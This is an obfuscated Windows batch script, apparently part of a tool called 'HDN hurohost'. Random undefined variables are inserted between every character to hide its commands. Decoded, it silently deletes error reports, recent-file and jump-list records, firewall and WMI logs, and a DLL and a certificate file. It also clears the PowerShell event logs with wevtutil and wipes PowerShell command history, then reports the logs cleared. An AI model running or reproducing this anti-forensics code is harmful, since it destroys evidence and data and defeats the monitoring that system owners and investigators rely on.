d%ek%e%sTjYdtPtSt%l%itNDc% %NMrF%/%D%s%RzNoDp% %TRgm%/%d%f%vINvsN% %rerBnZyDhO%/%ntnOIuRA%q%YuRtkpSrM% %OwruS%"%BK%%ProgramData%\%dhLFX%M%aBcwg%i%D%c%wI%r%sZmwC%o%a%s%XG%o%mGQhOqZH%f%zKzQEXK%t%JxJ%\%GFhBqI%W%QhEzJbV%i%JirfyHeclM%n%w%d%F%o%ynqJFNY%w%uOstnzeAk%s%Oi%\%HCVHw%W%zjfQvsTLNn%E%wNcX%R%cX%\%CN%*%lj%"%ZFSHPXU% %TeIxppRiLr%>%qeXKlm%n%kWymBLMM%u%u%l%UNNDQ% %fUvuGlJNBe%2%TMSD%>%jTuyI%&%vamj%1%dQThzBs%
d%DAfzhWQzm%e%yHNZS%l%pyZIJNMnS% %R%/%vFTQwJosJW%s%oNi% %FToCgsCgH%/%p%f%enAwTvYBI% %wHKFzeoe%/%VhzsMIqXid%q%mwgkrGemku% %PwbaIDBhZ%"%OiA%%AppData%\%SVhMoo%M%ZDywtO%i%tUNguTC%c%xjjTO%r%QVXhqD%o%AfAeoiEs%s%Ji%o%K%f%PmNlbSLL%t%qC%\%OPWfMf%W%dpWO%i%vKQjWXQ%n%tNApiz%d%JyAEErpwo%o%fvq%w%knnVP%s%wwblElY%\%AHWu%R%X%e%TUVJKI%c%ANgY%e%aPIR%n%zUdTMUmct%t%O%\%tlSPu%*%dGb%"%kBKj% %Yx%>%sHmqEtiok%n%zhTkynW%u%kwXxOfE%l%bOvSCyM% %xHjnaoNWBk%2%ktWVHCm%>%xTmw%&%GhUBC%1%LlPHU%
d%qFv%e%DemfTSJR%l%jJJnlc% %DcnNAm%/%FVHKEwW%s%vvWiszBlc% %n%/%w%f%KKbFQb% %EHGzWPFrvx%/%HLulh%q%nFK% %KBZ%"%OOsHc%%AppData%\%tsDzf%R%bKxqH%o%LbQeOHFJLm%a%W%m%UHZql%i%YkKcTdaC%n%RtPkk%g%xxBoCrRjWw%\%mmJ%M%vNRMihwZs%i%nFE%c%pIo%r%PdC%o%KOtl%s%AAhv%o%PiOH%f%cUDQEnUmTK%t%tlUxt%\%eTJKpeshd%W%UNghMckv%i%QuVUzQ%n%nqzFKLoP%d%AQZjMLHa%o%OUBAdN%w%vl%s%rWnGZPEA%\%yenYlxXDg%R%qHfBiH%e%CJrO%c%FhLQZEfDF%e%po%n%yLeRCCjwD%t%c%\%Avp%*%J%"%qJMxMSW% %TCKPRGS%>%boU%n%ZGR%u%kuvHWPUpn%l%RKKPzH% %pzkgmINfXi%2%KGEt%>%gZvAE%&%CodWZrirse%1%zd%
d%tLPBBq%e%cP%l%bmf% %Fszel%/%DYKNVJf%s%lwYEOZ% %FbkIq%/%fC%f%UFXhAu% %JM%/%GolD%q%enWkpKMdA% %y%"%uSq%%AppData%\%VKLOAC%M%TGx%i%PfeKs%c%GrcDKPMif%r%m%o%epGsigEBC%s%ZyMzVBP%o%CioVKkK%f%FnHUG%t%ynjmqFUTs%\%ptYVdQCbJx%W%INyQU%i%XvQwMpG%n%VwoWzd%d%CXKrOr%o%kDyMR%w%cplX%s%leFCnaA%\%LDLezwlt%R%yiakUbsw%e%lrMnAmcR%c%dMJNeWFrVg%e%M%n%wN%t%hhYj%\%PoHzaQH%A%fJ%u%U%t%GAbX%o%ZsZkKIG%m%kmQO%a%wTowUPWz%t%NtWSrOr%i%efW%c%DaAOE%D%JapZQMp%e%eMwUqmQjY%s%IAwOY%t%MznWFHip%i%j%n%jm%a%cfPS%t%vERdmNzygD%i%Rh%o%LVa%n%vcHcdgTFU%s%IwaYqN%\%kTdFsAmBYL%*%ZO%"%eB% %ZfoikTiD%>%gK%n%PcfNg%u%zuZPSCKf%l%RNn% %XwJSMlvTNk%2%eIYqfGmI%>%PGsU%&%fmLmXZeQa%1%r%
d%Eqbc%e%vO%l%BWDVLb% %C%/%V%s%QNGGpSV% %mpeOjG%/%UJFUmlAit%f%skg% %PkaBqMV%/%HkNDtpSege%q%THnPOa% %UJJ%"%f%%AppData%\%NNi%M%kk%i%RepPu%c%nqYYg%r%kduNW%o%XZOTOEAq%s%ro%o%Ouyk%f%OUCUE%t%jpUDk%\%lARNiHk%W%pJFSl%i%cwCJnhIeL%n%UskykX%d%I%o%QeKCVPn%w%Gojvl%s%G%\%pTMZjUtw%R%uvvbveFRy%e%r%c%lAEW%e%FqlQxMIFEZ%n%obQHwngSC%t%gXjUvwUR%\%I%C%UnL%u%AXkGr%s%dP%t%TQGws%o%MzD%m%wtdOkxd%D%UnZW%e%yuchxuR%s%KeWELxEd%t%kIZdZ%i%TZGLB%n%cgmirMnPk%a%qmqalh%t%cicvvFsYC%i%sWLQ%o%Wis%n%wMSql%s%VaY%\%tEwwbtGYyG%*%JkUBv%"%Q% %jRPc%>%Jpjd%n%Diizp%u%yW%l%XkjjXNH% %fER%2%rZTVc%>%XH%&%zhC%1%kOyVmrInlJ%
d%NEBIxSGH%e%h%l%uUSGmfeUZ% %MJRalDVgz%/%hSvvSOhvNI%s%gDLJJH% %WKzOMlHxjy%/%BuZxjUchW%f%zeJFnb% %nDJbuIzpHu%/%KocPpYA%q%QBVSvE% %JxIDWFlgk%"%LYjeM%%WinDir%\%ERzPvRKq%S%vYMUse%y%lhnHzQkUe%s%f%t%L%e%pb%m%psiNBBye%3%lcRA%2%qtzMqaXE%\%kWMN%L%lYsWJJwga%o%dVGQep%g%tkhvmC%F%UeGbnHOn%i%wd%l%mEE%e%kGBd%s%Irj%\%OSgu%F%gV%i%kp%r%HUPfOYZkMg%e%XafB%w%jhJyR%a%kQMk%l%LlwGTmtfI%l%bPG%\%yKefgRtDKA%*%tWhhQCosb%"%nw% %yXtxF%>%Oe%n%lf%u%pnYUUn%l%IU% %shuzsLkOEp%2%S%>%QbhmwEte%&%J%1%ELQX%
d%l%e%XIuYi%l%SwwSI% %DuvKoS%/%xnVI%s%k% %MkEHAuNa%/%cbcDgah%f%VW% %fk%/%FOHDJ%q%SV% %FUvSTr%"%GfLFCXdLV%%WinDir%\%qSIH%S%pWbCjedsiE%y%tRG%s%Fmwt%t%bZhmWq%e%PVhsKSJ%m%vRWB%3%ztPdRZlzT%2%fnyHZKMO%\%nRTReaX%L%nMC%o%YwrhilkcB%g%EaHyYRlPjP%F%AaSM%i%Fmxq%l%xD%e%LWu%s%NzFGPmfe%\%oSiim%W%F%M%DrbFY%I%pNQPMgy%\%QPyTIvfnY%*%SzB%"%EuxYYuUBY% %ClSbllZ%>%ITZlqqhI%n%SvK%u%exoeqTC%l%TPPLNSUsmu% %wBsqbWrlEL%2%jmtC%>%vzsg%&%fCnvyoZjEV%1%f%
d%JFHoyFpSct%e%STRcafyG%l%W% %jXftghlkFL%/%ObxINcyn%s%ONzTPDHYW% %sP%/%SWFp%f%Y% %erRi%/%oltYhg%q%peksR% %xYhU%"%uMRVtz%%WinDir%\%tkAf%S%GK%y%Xr%s%W%t%XOUTfVJJz%e%DDN%m%HSPdJqeJ%3%ivVBu%2%AVXTVp%\%FXmBHacCJ%L%KxC%o%TtolG%g%d%F%tsdIoQGGtt%i%IPoHhfbJ%l%rxfM%e%XrZEaiEeDD%s%u%\%UsMubOS%*%c%"%XAXBbi% %TWrGLu%>%anHe%n%G%u%hAN%l%bNr% %byDGhOUP%2%wthb%>%gUTFs%&%hpR%1%H%
d%Hj%e%NuWJs%l%EM% %QCN%/%D%s%tZsWZq% %kWgaAU%/%ElzPz%f%BecADPXow% %cCv%/%ne%q%CfLHKtQ% %IuZVFAcCG%"%DbNKAYhFz%%dll_path%"%sHtTTWl% %jhyzVcqRm%>%pyoZbHopK%n%eN%u%isbdeL%l%eftu% %FxyQLDy%2%oMeMHkB%>%Fb%&%l%1%WIiE%
d%Mglt%e%ZwlirTU%l%BoNl% %zC%/%wLAQBPj%s%tzW% %wxnQDLrh%/%CAGcEd%f%XkMprMDHua% %hrAiFKSP%/%uci%q%fiVjfHYV% %eX%"%je%%cert_path%"%LKfk% %KOpiOcj%>%cvhJLzn%n%qUUMMOzd%u%tEkchNElf%l%XucKeUki% %IUmygGe%2%Ml%>%x%&%HGwMPG%1%uC%

:: ================================
:%yg%:%hTJybz% %Gq%=%CQJyrKhRZV%=%pRl%=%eySgsq%=%EGK%=%i%=%aMknwfi%=%OAtOV%=%umWtdow%=%YKy%=%UChMIYM%=%h%=%vKuuOoml%=%ddZ%=%Wu%=%qaqvD%=%LInsgc%=%YDHFdbjvXS%=%jLtEdcI%=%XvgsEe%=%j%=%mf%=%ZXoCvBagOi%=%xRWXa%=%Vn%=%nykwnnE%=%v%=%OrAThtYO%=%ZPkCuLUP%=%PMepvz%=%HMC%=%xy%=%c%
:: Remove PowerShell Logs + History
:%MfoPkAGJAk%:%JhkqCLV% %mXkdMYiD%R%aBZbd%e%HJcgNyu%m%JaBwSmmO%o%itpjP%v%wge%e%qkYi% %meFYCMwK%P%nrncDCS%o%jU%w%nUe%e%RGX%r%TR%S%YD%h%js%e%T%l%tkNxo%l%XxgcX% %gnc%L%YJvMbqCW%o%RdJKiaYY%g%RCkQVsVK%s%olVaIWm% %EYgQ%+%umojf% %y%H%E%i%vGEs%s%BQIvkU%t%gRMagjuGA%o%Se%r%scS%y%YMODE%
:: ================================
:%yWotRQbjXm%:%S% %COFxhsbNEU%=%uLE%=%LUhZkAqo%=%aGICoV%=%vDfjCR%=%ZfBkAo%=%QdgheeBPTG%=%THaJLXiLc%=%e%=%lvqLUtxX%=%QJoYLtt%=%BCFIYFfP%=%fLBzvVX%=%rPTqgO%=%uWGpOGzLO%=%NS%=%xJlDKewe%=%lmNjE%=%kFES%=%dBqgIuCoi%=%thBAs%=%GNYlEr%=%nHP%=%qudhoRNSJ%=%KTkNo%=%f%=%UNxADqNMr%=%R%=%Wa%=%uLscEafS%=%irJHBv%=%VIBDIHLw%=%XWxqzTaUE%
e%QyHVtc%c%QQm%h%NQQn%o%pQKuUnr% %ELp%R%a%e%IBMjSD%m%wZmDDeDm%o%XUyNfKwf%v%VYMzaKNeuu%i%oHkiidqkv%n%NclbDMqKyL%g%mJEvoSOK% %jeLUqsznJd%P%pXihBak%o%XmLiQ%w%qeeYWzI%e%zBhSzHD%r%CMZdMu%S%dUgHhglz%h%ReEbVD%e%bip%l%ltS%l%jIedt% %ukGmzVx%L%zppk%o%KUBBTsIx%g%iuywiG%s%bhlh%.%ueOLOPIiDc%.%SbwpWzVE%.%bF%

:: PowerShell Event Logs Clear
:%BxnK%:%WgUuWYtZG% %EGGA%P%sGHXvNE%o%CfRJSSbo%w%jiWOJiAqab%e%tlvCf%r%pBd%S%kfvIhTvma%h%zcmHl%e%HDeqJ%l%nrmRaW%l%u% %aKShdDFRPk%E%cdEUTOqV%v%EA%e%PfytVJq%n%lPjiqUlAgs%t%vvCgdz% %SJoF%L%CfhHIeBfTY%o%EtMztgY%g%gkkX%s%YVciaI% %WkAw%C%mp%l%P%e%ScmE%a%l%r%XoTyOFHHf%
p%epXXj%o%AkbaEDbphU%w%XgnfFx%e%EZuVUjF%r%jvqEOb%s%CEo%h%uDDYNzVZ%e%RSfCc%l%pZFm%l%wOagKFF% %pNGwiXK%-%EgBnJrh%C%iJDzGLybu%o%Sdo%m%kYxHAONppb%m%tdCJZyelE%a%PrOBzT%n%YPUqHK%d%NSTWsqBB% %GCXsuM%"%R%w%Ffmp%e%F%v%qquLeQYHZ%t%saUa%u%R%t%dh%i%GyvAF%l%OUj% %YaWAeQNt%c%Z%l%nG% %TvXvQw%'%yZEopqLGf%W%SOqZmAb%i%BfRa%n%CQe%d%ubjso%o%lgoM%w%WDUw%s%AFNeq% %pZhlDtNosw%P%J%o%VsUxpD%w%xAKEjYW%e%DeMFhbh%r%glWcCqaVEt%S%tKZuGKLEa%h%T%e%u%l%L%l%FGHOdSgLen%'%iaKhcukF%"%UEafuiYPg% %iOAj%>%d%n%pmPZiPTFlH%u%fivBIpwwgg%l%BQnS% %fHwUZO%2%m%>%upY%&%jBaTxlY%1%e%
p%OYzvmcWhh%o%UAP%w%PQaLT%e%MKPQRM%r%UPnXn%s%MMF%h%HdSCWjlcPw%e%MkFx%l%chnE%l%xNHRVYnGHZ% %Iaq%-%XBLUSA%C%FsAef%o%WtosGqRg%m%fFXTZZaVdl%m%sGWsZ%a%xx%n%FMzS%d%OEe% %UxFHeFs%"%T%w%YqTiIz%e%oT%v%OTz%t%yy%u%HKJEQw%t%iai%i%jQjaK%l%MAufOA% %QbbEpUyg%c%eJrKcoles%l%BrrUaEyS% %HRaaIn%'%ciRL%M%C%i%ANaZf%c%ErH%r%WNE%o%H%s%KJXwl%o%EYUvKkW%f%LuTWbn%t%qt%-%HUzkmyLc%W%GuHXxMb%i%UZGH%n%Q%d%FRawohUch%o%dBhb%w%xjoqHO%s%f%-%QofOJx%P%VLShsiriN%o%jxfdy%w%ZWJxLFz%e%MGgF%r%hugSgpqTgr%S%WEmQnjSRf%h%WPetgnCtU%e%dZWP%l%qCe%l%tgwD%/%IhuNUc%O%srusfNCM%p%cGzGfYAWX%e%mpdo%r%BtnsQewLm%a%eaV%t%aztI%i%tscqsR%o%WFaIk%n%NOt%a%aDZUXh%l%hJU%'%NLa%"%unKtogd% %vnwaTbJCha%>%GSpUzLbzN%n%VZH%u%W%l%HNmKBgtyzm% %DxGIc%2%MqFwIgZmCQ%>%GM%&%OiYtenTM%1%chVMQTbD%
p%TOVESN%o%cFIRCXy%w%JMkLmfZr%e%OVKf%r%KjBfAJrL%s%cMV%h%oLKlKO%e%y%l%PInKUebTi%l%buXZvQ% %ZJgqe%-%okJsHsjw%C%Q%o%LJxHhXg%m%eTArXJJ%m%Gm%a%lPOMP%n%UolaY%d%E% %hYjsLXXyvq%"%S%w%YwR%e%dyJpuPTW%v%qupGUTlXEv%t%JlEus%u%pp%t%NSzd%i%wsz%l%qofw% %BrT%c%kM%l%zynq% %TrhFBriuF%'%PnJDBsIZEh%M%hgbh%i%GvEYtsoCk%c%E%r%a%o%ZVwQjk%s%a%o%xDOR%f%YzUdj%t%Ws%-%FL%W%uxwU%i%S%n%SclVC%d%P%o%RprZZeVgM%w%MM%s%h%-%ryljWoszf%P%qtQ%o%lB%w%t%e%EhLZSptcp%r%z%S%q%h%ajHQCdKq%e%O%l%osKDo%l%k%-%uUYo%D%YrskxGcx%e%ORjBn%s%zGOWVHq%i%vPsac%r%JrkcyDBGK%e%zOlTVzGt%d%wpg%S%EDtHBbfLNV%t%MMRYCWF%a%oDFwyN%t%EOPYmgmE%e%NtdzkWx%C%ZbzRaAKLg%o%AAz%n%PNygHCQyam%f%tnVu%i%FAI%g%R%u%kUePVJ%r%cqKLmlic%a%KxpvgOtCl%t%rwwvJphNQ%i%JQWV%o%HaueROKzG%n%uFfnMcSe%/%cXflwtTVH%O%Ho%p%npQT%e%ZiBuW%r%Rwe%a%efMEZwuK%t%oJ%i%LodgXGHh%o%KuyzTrnm%n%fCHdNABzd%a%cru%l%RW%'%jQ%"%ooPuI% %PekRN%>%AFJJ%n%OM%u%TVTx%l%NlqHWSV% %PdpPUrZgKm%2%KKmiIx%>%wuJI%&%bD%1%ULfsinpafK%

:: PowerShell History Clear
:%uJA%:%sirF% %zpZoVApIn%P%xOUhFTK%o%dsWg%w%LnGSLaY%e%WmXoRvAwQR%r%tslmUU%S%teEFOV%h%ykaI%e%F%l%keR%l%KdAT% %CDPHUZkDe%H%XUSUjvx%i%FYUTDD%s%GQQMX%t%aYLSR%o%sHa%r%Hrt%y%Vua% %Oj%C%bh%l%CflwmbuAD%e%MDjkCodyYl%a%GLjKuo%r%tUWtA%
d%JkSSRO%e%ljEEzwErtc%l%ZtBRXfem% %ONnsZ%/%rSXMQU%s%FwdqjZ% %wgWak%/%ntRLyH%f%fGXPoJkJg% %dNtaE%/%uQKTCiRk%q%VPduKQpd% %r%"%HYUhvpW%%UserProfile%\%bFwZtOMGbi%A%cGRjz%p%pREwalLD%p%vybzeP%D%D%a%LjBh%t%lxVdbYnNO%a%HGMvG%\%JhJwgVpJz%R%wnTnI%o%eUvi%a%OOkyiKZ%m%gnPMT%i%ZmFBVDQ%n%ITRnPqoe%g%QrqfpGgK%\%NhXp%M%vrTI%i%P%c%wCD%r%MoMz%o%IVsCh%s%JN%o%aMLwnubCYK%f%k%t%O%\%F%W%g%i%ERwPteHyz%n%cReSaxl%d%Pyd%o%ZesXL%w%dmVQIjim%s%kjmWz%\%vtaBpKT%P%AJOpgyYtzJ%o%lFEPdftV%w%XQeXNkFXG%e%kHVOR%r%bBuATnpZF%S%YEu%h%HMntY%e%hQMkJOg%l%fPtOis%l%GOmzyI%\%c%P%nMzulUsM%S%C%R%r%e%if%a%CFi%d%O%l%nECZj%i%sGxbMann%n%mAURYIURbn%e%uplpFkJBT%\%MKAMx%C%DIg%o%rxycSA%n%Q%s%IHfov%o%hdMAdBmW%l%QVGq%e%ZRljxoSA%H%l%o%CmGrfzeIq%s%NEiiLJkH%t%lFMBHQDK%_%ndcolrMNvM%h%nsNcgYwEH%i%MSffYqh%s%w%t%PxZCtDlqNX%o%WOUb%r%ssFjRu%y%gMqzec%.%fadeDGzd%t%xwnT%x%eki%t%WVsLZxLIL%"%trN% %IIHTrDG%>%s%n%HrnUNxuK%u%mvJMulxP%l%LjbNvZ% %QXMpberkaL%2%t%>%XVkFpQkfOj%&%BibjHDJfE%1%yfsw%
d%iUNJfIok%e%SRHh%l%oZxTkLJY% %yq%/%xVOO%s%qvTPNBkwp% %qE%/%cUJRNBn%f%dWGh% %Wbp%/%cSb%q%nVO% %GlxPLVon%"%ElTMLx%%UserProfile%\%OP%A%WVbWwOrTij%p%XxWKCE%p%eAQl%D%ImWGzjWn%a%NrO%t%Z%a%QCHe%\%rSvFOtDyTI%R%svbCBoK%o%bHLBkiMlL%a%omjglHrqT%m%juphRsl%i%GSOVizTZG%n%gSl%g%URqraW%\%djupL%M%gNxhv%i%wPEZTjLMPo%c%iocvADdWB%r%dp%o%FSRZ%s%GJjucVwoJC%o%mMFlSmzf%f%ESS%t%gzK%\%DMlG%W%mEJgRGDW%i%um%n%qBIyL%d%fEs%o%vvnoq%w%aCxCfXU%s%ZyyNcG%\%plBKXiZoNZ%P%gzDqb%o%OE%w%sLcyEA%e%V%r%Dp%S%GyprIyeY%h%VLZu%e%es%l%hsBhSIPd%l%HSEijF%\%T%P%tMPZwuL%S%o%R%YAYIKrc%e%ZKD%a%g%d%dtgKWO%l%AePVUN%i%HLwPEum%n%cRdfJYg%e%TnZv%\%RBf%*%ZMZRjxwrF%"%ErDM% %uAMBvNhGYc%>%bFKq%n%TaDWsBUtkV%u%EnYWqgYa%l%kW% %SfjMA%2%oFy%>%NchDzBvHL%&%yIrYsqB%1%JO%

:: PowerShell Local Logs
:%u%:%Fg% %hIRZ%P%SXcnK%o%oyElqax%w%zpXNx%e%ornycxiC%r%k%S%CXMZbVM%h%ftlBLpgzM%e%FaQ%l%AUJLf%l%x% %HWGD%L%whYVuUAG%o%JKmpmoDxW%c%uY%a%MkoYkzu%l%LHXr% %dppu%L%bC%o%AOkr%g%Yxn%s%FnmvnM%
d%UNFwXFnHEP%e%xKcNgf%l%sMseCvE% %OpMQdgYzw%/%Ggqi%s%xL% %svr%/%npO%f%OtBXQehIDi% %MZtW%/%precs%q%VQQdFNc% %bgdBybN%"%DfDkZ%%LocalAppData%\%eZW%M%XabGFdBg%i%tLx%c%jMm%r%OGH%o%XgT%s%MTZZkYycz%o%GI%f%xQDJZrY%t%rtho%\%UqCt%W%hnnxqXwB%i%cnwSGW%n%wY%d%gYlbdA%o%fKdqwgM%w%nETRQwfaf%s%NSCVw%\%IxdgFe%P%oAKM%o%hMfLHZl%w%HtNuaQdA%e%Z%r%QuOg%S%XoFFbukG%h%FaSmjdgez%e%nunvMaj%l%ihA%l%sDmEakB%\%ianUg%*%NflNX%"%U% %MlVPNjJ%>%xsysUWm%n%VpG%u%LZ%l%Q% %Isi%2%B%>%f%&%dCDPTjRnV%1%wzmQncu%

:: PowerShell ProgramData Logs
:%EhRmiky%:%vqReIsU% %Jer%P%Jm%o%DixQZs%w%Xya%e%tBR%r%ocIprhyoM%S%N%h%yvYBouSvk%e%X%l%aMHVCaI%l%ElX% %fVdbOFvUsE%P%EPHT%r%RJxa%o%TeAXOISLGw%g%MDj%r%EVjMnPsSlk%a%sqFQaP%m%aWcztzjS%D%aReftB%a%BD%t%BhaQtDNwz%a%tXXKtEBUd% %yQztpocUYK%L%wnxDDfPSr%o%RKg%g%QhALRHZv%s%YziYUqf%
d%j%e%uJGVfS%l%RcKsm% %w%/%LjtyCKeSO%s%dlemOFzyW% %AMU%/%MFandCEi%f%Ln% %sr%/%fXLIuqSfu%q%sHQuMqoLz% %jFGkEcb%"%eyVmNxVcW%%ProgramData%\%hTBdZkMwK%M%oydnIcraIh%i%zy%c%GE%r%uRoJFCCKV%o%Ggv%s%fKCVVJYlCw%o%CvqF%f%aKbToQSq%t%WF%\%Qpj%W%n%i%kU%n%kXHcxdUtZ%d%SoymFLtyZ%o%BPXwAngwo%w%GawAXLKUa%s%zKG%\%mlGtUE%P%ZqGqBmF%o%YSWFajg%w%WnKdTAXI%e%YbrHeqdl%r%HOKL%S%fmPHXlRk%h%rgQjU%e%S%l%a%l%z%\%c%*%jrOr%"%MZnwLHdwMg% %zMXhC%>%CLD%n%U%u%sEXSRBtlH%l%OZ% %JWpvXk%2%Xx%>%RBhp%&%LhZJ%1%DD%

:: Roaming PowerShell Cache
:%MfCKNo%:%BKJucNq% %kiqemNk%R%Ejxs%o%JX%a%NuuBi%m%TBq%i%VK%n%eSi%g%PxnFoYz% %IlyEOiPCR%P%qPMYGhYX%o%Uths%w%JzucSBE%e%shYAdew%r%Yfw%S%OfywlFil%h%PkEJ%e%XlXt%l%jnJT%l%GjaDLvbjXw% %IujaK%C%raIwvbLUvx%a%SfNCbMflZk%c%YLPMysXHVo%h%GcaB%e%URucdfKPW%
d%mSXrId%e%XnWaGQYJHA%l%a% %zREOTg%/%RCVUjv%s%gCQ% %ebhZkZkzi%/%OxFY%f%JHYUOAFoFi% %rZZF%/%CKvNi%q%vNVpPD% %VR%"%RQhB%%AppData%\%ngaabExa%M%rfc%i%jkCMgg%c%pWu%r%yLYCofe%o%NSQtrQ%s%UU%o%NalV%f%bjJeoRAn%t%PkqnKArFG%\%leQ%W%XQCp%i%OIkeqWJd%n%Oc%d%Vmt%o%sW%w%vMvHTiKmE%s%hECbvNvxW%\%hmohxB%P%VC%o%TCMynAk%w%QmzfcuLi%e%nunvQbwm%r%rlIFtpOtm%S%Xz%h%plYgA%e%mtFwRJoEX%l%nSUa%l%ovczc%\%afmh%*%qVxUWaNm%"%RXmYYRuF% %OTLlX%>%kW%n%pMjmdevsdz%u%p%l%QlAJuojWFc% %FQEazkcgpb%2%rUFhMnwQ%>%PIDThVv%&%oLfqxdrh%1%yXMvxdudA%

e%TIYrFtnO%c%ntG%h%jlgUsIw%o%Jdrf% %XHElvBWtjF%P%TPuLw%o%twyuGt%w%KnYxw%e%LJxRQKPseE%r%EScnyErM%S%Z%h%hNGFp%e%AJZjUGrN%l%aCPelQuedU%l%IICwCF% %kSXW%L%gtCYx%o%LgpOR%g%Lag%s%vlafCZvLGl% %qQ%R%WDv%e%u%m%z%o%LaOcm%v%FbU%e%HqetEYKNF%d%KKBttQWLMx% %qIPoh%S%rkem%u%PBitaeL%c%coF%c%qHNCAGxFOP%e%g%s%ey%s%g%f%PsO%u%bwTtCRwvb%l%kZoxXvb%l%Yx%y%UyIJ%!%nLlk%


e%dJZAkwsORR%c%HQTs%h%ha%o%ZhxeLiNtS% %RR%D%LioAIbQ%o%TkXFRPzML%n%UWKSVH%e%nuI%!%BXRkfolVky% %vYcIld%H%BzJHima%D%JUTMJocx%N%In% %G%N%h%e%jNTrLVhwZb%u%dW%r%UZHmirlI%o%cvHuhyH%h%g%o%nUn%s%IzVVNRUlHM%t%jpBdxO% %k%h%pYwLRqEwTJ%a%qQQDluSGjc%s%z% %Rvkbz%b%uZ%e%zjVslpuQb%e%fBnAbPSC%n%ADvjLIF% %hYUmfmUS%s%QcdOcUh%u%mbfd%c%JkUshOvA%c%zhgFRnBGX%e%SjpnmDjGs%s%CSbItnxXTa%s%dLKpQ%f%ISDSykg%u%dyyz%l%Lcazs%l%JY%y%XOeXBq% %gihXQj%a%PdtIY%p%uGDLaE%p%tITFIE%l%CyjR%i%UAv%e%cNUKlu%d%Q% %Zw%a%UKkmJk%n%PcfXq%d%ORzIF% %ODPmMz%l%lA%o%ogAH%g%RcNCuwBhp%s%BhQ% %fUjJ%c%HmyFW%l%wgJKza%e%FOowhwHGHU%a%DFuhmPLcxw%r%BABWSqkxy%e%N%d%WJK%.%kMlAcZrrK%
p%WfhLGGv%a%pxauGWokG%u%tVLxZZ%s%y%e%IGtLG%
g%yZdwfccAZ%o%Kkit%t%BkNp%o%sve% %DyNlT%m%Od%e%BXWtvoxGC%n%ZHd%u%mzXqTkZgGS%

:: Restart stopped services
:%fvlYL%:%IRAQSYrHmA% %eKKRsRgkNA%R%lrdERahuZ%e%eXeeafhN%s%oSWZr%t%eMzUP%a%NkVJDU%r%HHNUidH%t%eHAj% %uA%s%vstEDVu%t%UUrfJKh%o%Iq%p%DmSAnx%p%qGszBBXdsz%e%XykkAsd%d%pEa% %MDJfGDvZi%s%lEAZPUiKO%e%yNbmYUb%r%EY%v%kwSniCYzT%i%cThr%c%fe%e%LDBFieqZmN%s%FygpGEPjX%
n%OQFvFoZky%e%VSy%t%eRdfZUnD% %szCDjkA%s%PzpAQT%t%roU%a%veRhqhbsIP%r%KIUABdnrxe%t%ABEjuNkc% %lFQOKaFS%w%eoRyp%u%epD%a%azWbB%u%doGhFxK%s%k%e%aseaA%r%xYdgOW%v%oDwctKOmsH% %rrvOX%>%HuVPtKQjoc%n%DjfajoXFYW%u%OVHRsE%l%iuompWmEEh% %MWDlYwv%2%eEGSJGyTe%>%oNtO%&%YOMzAcyHib%1%yjpjkolR%
n%dQRkaXOW%e%gCaF%t%P% %iVIsFxrk%s%tse%t%Gg%a%hKdik%r%q%t%iRTu% %pIIIFJGjwv%t%W%r%HjMOhOe%u%senhRDV%s%jtPAcH%t%NuunoQSOFu%e%allps%d%alsPZAM%i%Yu%n%BmFg%s%ZHwccEA%t%NxxnRDf%a%JPM%l%B%l%RRqcdO%e%cz%r%PtdoKGAtUV% %cYezef%>%oNURRIXoYh%n%GRtPJvKYU%u%uuSd%l%MhICkp% %yIP%2%KfR%>%g%&%HMLunmUtR%1%LWXllUfuXi%
